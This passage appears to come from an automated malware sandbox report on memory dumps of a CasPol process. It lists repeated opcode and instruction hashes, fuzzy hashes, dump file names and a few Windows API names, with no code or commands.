                                                                                                                          • Opcode ID: be2f993d11ee9ab588c5e2d3580a9a1255d0880c7d76799f5a571978e982be3b
                                                                                                                          • Instruction ID: 384538ec259ee6c0d66cfa3bdd5766a7a977cd612f229ad8e01479b10f767dd8
                                                                                                                          • Opcode Fuzzy Hash: be2f993d11ee9ab588c5e2d3580a9a1255d0880c7d76799f5a571978e982be3b
                                                                                                                          • Instruction Fuzzy Hash: 414214B4A01224CFDB68EF60CA9879DB7B6BF88205F5084E9D509A3744CB359EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 0693b0dc7146ad2a93d93c515074f254d6c31901bf4528fd91777d861996d4ac
                                                                                                                          • Instruction ID: 110c8893c7f0c95fb214900e4b01d6bc6324ccb7f3da8771408b4fc122adabd1
                                                                                                                          • Opcode Fuzzy Hash: 0693b0dc7146ad2a93d93c515074f254d6c31901bf4528fd91777d861996d4ac
                                                                                                                          • Instruction Fuzzy Hash: 634214B4A01224CFDB68AF60CA9879DB7B6BF88205F5084E9D509A3744CF359EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 61eebf936c63e0bb4bafb0916589876e54c9f2055fa4ea289b37ea3878270b11
                                                                                                                          • Instruction ID: b1dfa17ae5139ef1d709d59302223125da4fdace6e31d6c2b737defa0257988b
                                                                                                                          • Opcode Fuzzy Hash: 61eebf936c63e0bb4bafb0916589876e54c9f2055fa4ea289b37ea3878270b11
                                                                                                                          • Instruction Fuzzy Hash: 184213B4A01224CFDB68AF60CA9879DB7B6BF88205F5084E9D509A3744CF359EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 0d5a0397385395577a9066da239e021cc58ad65c0b0991c71a0a8c886f1e1435
                                                                                                                          • Instruction ID: 082b2ecded63bbc9728fb01c0a7f4f34ee9c5a8a044bd502e605499d0f66d106
                                                                                                                          • Opcode Fuzzy Hash: 0d5a0397385395577a9066da239e021cc58ad65c0b0991c71a0a8c886f1e1435
                                                                                                                          • Instruction Fuzzy Hash: 2B4213B4A01224CBDB68AF60CA9879DB7B6BF88205F5084E9D509A3744CF359EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 3eb2aa1e780bea7b3f023423c6d94f20bd0dc14db39f569ef9cdb5747aae843c
                                                                                                                          • Instruction ID: f820374bbed74cd8ab461604873276d2b4f881d04a3905d4e15e5be47b81a8a1
                                                                                                                          • Opcode Fuzzy Hash: 3eb2aa1e780bea7b3f023423c6d94f20bd0dc14db39f569ef9cdb5747aae843c
                                                                                                                          • Instruction Fuzzy Hash: B64213B4A01224CFDB68AF60CA9879DB7B6BF88205F5084E9D509A3744CF359EC5CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 3f528d3ff075a648fd7112ad72f75c395c3d1771e7029d959d1a73801701f879
                                                                                                                          • Instruction ID: 5cad09dd6e888278658f8530e66fac7cba86f369e34638311e7e732a5072b067
                                                                                                                          • Opcode Fuzzy Hash: 3f528d3ff075a648fd7112ad72f75c395c3d1771e7029d959d1a73801701f879
                                                                                                                          • Instruction Fuzzy Hash: 744214B4A01224CBCB68AF70CA9879DB7B6BF88205F5084E9D509A3744CF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 097cead5258f7fc650d2eec41f9f9a4ff3aad4f86e1ee1b261154c9a19fb05e5
                                                                                                                          • Instruction ID: dfebfa73ef15ecb1657a2b02013387cbc90ae323dd9986194092ad054355389c
                                                                                                                          • Opcode Fuzzy Hash: 097cead5258f7fc650d2eec41f9f9a4ff3aad4f86e1ee1b261154c9a19fb05e5
                                                                                                                          • Instruction Fuzzy Hash: A63213B4A01224CBCB68AF74CA9879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4ba28ec2814501d59b1bae917f3b56deb69d90afa6cd25010abe68012389fa4f
                                                                                                                          • Instruction ID: ed656b7b64193a9dbc1707a60fc1eaa01b3eaf9f5e9f9a5a3651930762ba76bb
                                                                                                                          • Opcode Fuzzy Hash: 4ba28ec2814501d59b1bae917f3b56deb69d90afa6cd25010abe68012389fa4f
                                                                                                                          • Instruction Fuzzy Hash: DF3213B4A01224CBCB68AF74CA9879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: eaada7850fb90256a773a4c29669431b7e681796ab016bfb798b3fe58bf37d08
                                                                                                                          • Instruction ID: 6f143765643fc1e22b21be16062b9f7fc101fecec6a2ec75dcc28127a05fbc23
                                                                                                                          • Opcode Fuzzy Hash: eaada7850fb90256a773a4c29669431b7e681796ab016bfb798b3fe58bf37d08
                                                                                                                          • Instruction Fuzzy Hash: 9D3214B4A01224CBCB68AF74CA9879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 381bde3ee379cf3b8b650f2c180dd2658baaccbdc8902d228c870dbae22aabfa
                                                                                                                          • Instruction ID: b7b68e37963cbd8933057c358a175b0afb5079c6be67f8ce10913483c954a246
                                                                                                                          • Opcode Fuzzy Hash: 381bde3ee379cf3b8b650f2c180dd2658baaccbdc8902d228c870dbae22aabfa
                                                                                                                          • Instruction Fuzzy Hash: FD3213B4A01224CBCB68AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 767d8b6b5c0bb5a14ee08585b598ed824d901d1046d36049d28454ea56b03442
                                                                                                                          • Instruction ID: 93e9b4c00af178c55ea4afd62724d1d812c22cf7b97bd76aa60e33f15f492447
                                                                                                                          • Opcode Fuzzy Hash: 767d8b6b5c0bb5a14ee08585b598ed824d901d1046d36049d28454ea56b03442
                                                                                                                          • Instruction Fuzzy Hash: 243213B4A012248FCB68AF74CA9879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 149a26b11948aab9752d7516b2cc978f74405d69996ea486b2b09d01482615f5
                                                                                                                          • Instruction ID: 2a87f916df98059216fc75b67726a7583afcd577a4f448f547ee9609ac7a6fbb
                                                                                                                          • Opcode Fuzzy Hash: 149a26b11948aab9752d7516b2cc978f74405d69996ea486b2b09d01482615f5
                                                                                                                          • Instruction Fuzzy Hash: 8C3213B4A01228CBCB68AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 48e2b1dd91f85f160976d20af6a388675525fd0677141f7c694d45c9c0768fba
                                                                                                                          • Instruction ID: 9c39953de948784857ecd4e997e3b84eb09fd5c0d60da14752ed491ab5525143
                                                                                                                          • Opcode Fuzzy Hash: 48e2b1dd91f85f160976d20af6a388675525fd0677141f7c694d45c9c0768fba
                                                                                                                          • Instruction Fuzzy Hash: D22213B4A012288FCB68AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: da973f28803e93079dc97ec78b872d60ee4f4f404f02186b162b0db8b8ac0a3c
                                                                                                                          • Instruction ID: c8270783c58c8e91919cbe4eef492bef02918eccfcd6a90567ba80aedc86ed99
                                                                                                                          • Opcode Fuzzy Hash: da973f28803e93079dc97ec78b872d60ee4f4f404f02186b162b0db8b8ac0a3c
                                                                                                                          • Instruction Fuzzy Hash: 2B2213B4A012288FCB68AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4305a3b7602b8512961a7d91ff126f37b5a741e993faa24745aae9670de9a8a4
                                                                                                                          • Instruction ID: ef3a55c70bb86864b6f116fd3a256ef207f9b191c788c89d4a02cbd4e1835435
                                                                                                                          • Opcode Fuzzy Hash: 4305a3b7602b8512961a7d91ff126f37b5a741e993faa24745aae9670de9a8a4
                                                                                                                          • Instruction Fuzzy Hash: 622213B4A012288FCB68AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 473e4a0529592c2001b5f1ed0d82ccfcda569b341ba3114a259a2db331d8b91c
                                                                                                                          • Instruction ID: 4383e778d61bc88d63baf9769596860d0538e8d71452de4c0eb551c09e1ae5fb
                                                                                                                          • Opcode Fuzzy Hash: 473e4a0529592c2001b5f1ed0d82ccfcda569b341ba3114a259a2db331d8b91c
                                                                                                                          • Instruction Fuzzy Hash: FF2214B4A012288BCB68EF74C99879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 9351978d9404c6a8b0b3f48fa3c6aa478a1f0b26d1962b148743941d8338a4c9
                                                                                                                          • Instruction ID: 95041db8e1755aeb8e681005b372589a3c140912a41441eec43200035db95e8a
                                                                                                                          • Opcode Fuzzy Hash: 9351978d9404c6a8b0b3f48fa3c6aa478a1f0b26d1962b148743941d8338a4c9
                                                                                                                          • Instruction Fuzzy Hash: 5D2214B4A012248FCB68AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 6ebee430d26666e8430842aa1bd124eb8cef013e0c9b542d4776f1a065fdec06
                                                                                                                          • Instruction ID: 0505480f3ab828060c4ab6ea52ee092bdd6b3b6dddaab86f4c213be7ee735f3c
                                                                                                                          • Opcode Fuzzy Hash: 6ebee430d26666e8430842aa1bd124eb8cef013e0c9b542d4776f1a065fdec06
                                                                                                                          • Instruction Fuzzy Hash: 202225B4A012248FCB68AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC5CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e4bd34d15e43686cd7ecb1ef7c65170acdd2881a8a2940f0f2a73c187197be54
                                                                                                                          • Instruction ID: 382fb86f81306b7c36a87a24ef9f0b311fb976542ac49f23fffbbbbaba98a704
                                                                                                                          • Opcode Fuzzy Hash: e4bd34d15e43686cd7ecb1ef7c65170acdd2881a8a2940f0f2a73c187197be54
                                                                                                                          • Instruction Fuzzy Hash: B61225B4A012248FCB64AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC9CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e02b21aa8021618ad0331fbe07bb78df07f3ede2e9e3263caf643ee5a1e65d13
                                                                                                                          • Instruction ID: 8e7691f770dca08c9fcea93cab7a57d6837e2c4da0d68687c83c15d78ad318d3
                                                                                                                          • Opcode Fuzzy Hash: e02b21aa8021618ad0331fbe07bb78df07f3ede2e9e3263caf643ee5a1e65d13
                                                                                                                          • Instruction Fuzzy Hash: 011236B4A012248FCB64AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC9CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e701da129760847b959a43e7009b785a69e7e31b41825753cc97142c981c2373
                                                                                                                          • Instruction ID: d61077efe5604ce55ca411f88e23e3b3131a384ed0109c6c8efba3d164f56a4c
                                                                                                                          • Opcode Fuzzy Hash: e701da129760847b959a43e7009b785a69e7e31b41825753cc97142c981c2373
                                                                                                                          • Instruction Fuzzy Hash: 3F1236B4A012248FCB64AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC9CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e3dbf0dccdbd56595135deeeb35c176852d5b24901d9323e752d385426e8d3c0
                                                                                                                          • Instruction ID: 5c17b54851588c783c49026b3c9f27860b4d446b535caec9e4b131e8dddeecbb
                                                                                                                          • Opcode Fuzzy Hash: e3dbf0dccdbd56595135deeeb35c176852d5b24901d9323e752d385426e8d3c0
                                                                                                                          • Instruction Fuzzy Hash: B11235B4A012248FCB64AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC9CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: ea391795c91f3d22ddc45a96276337a5dbaec933f8f9e63c4388fb33d1025e84
                                                                                                                          • Instruction ID: 9e2974e50e5be69e4ea0d78a9a7ebf652b2f1f9ecc1d49f4c4ebc0b7b087b0ff
                                                                                                                          • Opcode Fuzzy Hash: ea391795c91f3d22ddc45a96276337a5dbaec933f8f9e63c4388fb33d1025e84
                                                                                                                          • Instruction Fuzzy Hash: 1C1236B4A012248FCB64AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC9CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820161441.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1040000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: bc4fc97b0daf377e541e2859033387642eccb5dd02201d434a265c33764cfee5
                                                                                                                          • Instruction ID: 507a9d4f9ded02cc5cdcbb7eebad0dca5dbe5069d280712c6f4ad8b63062f3bc
                                                                                                                          • Opcode Fuzzy Hash: bc4fc97b0daf377e541e2859033387642eccb5dd02201d434a265c33764cfee5
                                                                                                                          • Instruction Fuzzy Hash: 410246B4A012248FCB64AF74C99879DB7B6BF88205F5084E9D509A3744DF359EC9CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (ogl
                                                                                                                          • API String ID: 0-1777403075
                                                                                                                          • Opcode ID: f6a59872f8707baa8fc2045240e453358d939620943e3d9898db61acc9b86b55
                                                                                                                          • Instruction ID: 8b4760e4e0903cc557f7ea7faf646e6bce9f266d1763a738c236a0f4256771f9
                                                                                                                          • Opcode Fuzzy Hash: f6a59872f8707baa8fc2045240e453358d939620943e3d9898db61acc9b86b55
                                                                                                                          • Instruction Fuzzy Hash: 9B126B74A00115DFCB15CF68C984AAEBBFAFF89310F168558E40A9B3A2C735ED41CB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823196422.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1510000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: a45c570c02e488a6b0626e120a0831043d95a031dd00d2b3b2e6b50a60cad369
                                                                                                                          • Instruction ID: cffeab67e600744c2f578d60c2178cc186f839a5dc1bdebb54f050d822cd3c63
                                                                                                                          • Opcode Fuzzy Hash: a45c570c02e488a6b0626e120a0831043d95a031dd00d2b3b2e6b50a60cad369
                                                                                                                          • Instruction Fuzzy Hash: 36615074A103199BEB15EBB4D4947AEBBF2BF84245F50842CE4059B398DF349885CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823196422.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1510000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7b15e9cb475af84521bc95dab5d783b1aa9a4757835349bb2ad1d0e182fad888
                                                                                                                          • Instruction ID: f9600a8edae10bcc4638d321727412149872bb8ac9fa59e6816287aa5becd268
                                                                                                                          • Opcode Fuzzy Hash: 7b15e9cb475af84521bc95dab5d783b1aa9a4757835349bb2ad1d0e182fad888
                                                                                                                          • Instruction Fuzzy Hash: 21410471E047898FDB06DFB9D8046EEBBF0BF89310F05856AD508AB241DB749885CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 015107B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823196422.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1510000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3660427363-0
                                                                                                                          • Opcode ID: 459b75bfc3e8d42b34bd45a58ce5bdde723b369b22a6ab09283a216f55607b3c
                                                                                                                          • Instruction ID: 7f39262551b29207b2961693a9c415a96cc1e536c58bd240b0c7a4976c53bbb0
                                                                                                                          • Opcode Fuzzy Hash: 459b75bfc3e8d42b34bd45a58ce5bdde723b369b22a6ab09283a216f55607b3c
                                                                                                                          • Instruction Fuzzy Hash: F44139B0D003589FDB11CFA9C884A9EBBF5BF48314F14806AE818AB355D7749945CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 015107B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37823196422.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1510000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3660427363-0
                                                                                                                          • Opcode ID: 209c81e7c297e5d60cdabc1a66dc98a3bdcaa410d1d10c19d53a6bfd2a28736c
                                                                                                                          • Instruction ID: ea29a3b74f2119bddd89c8cd6d5b264e8f59c2118163f7b3b8283628fdf0610a
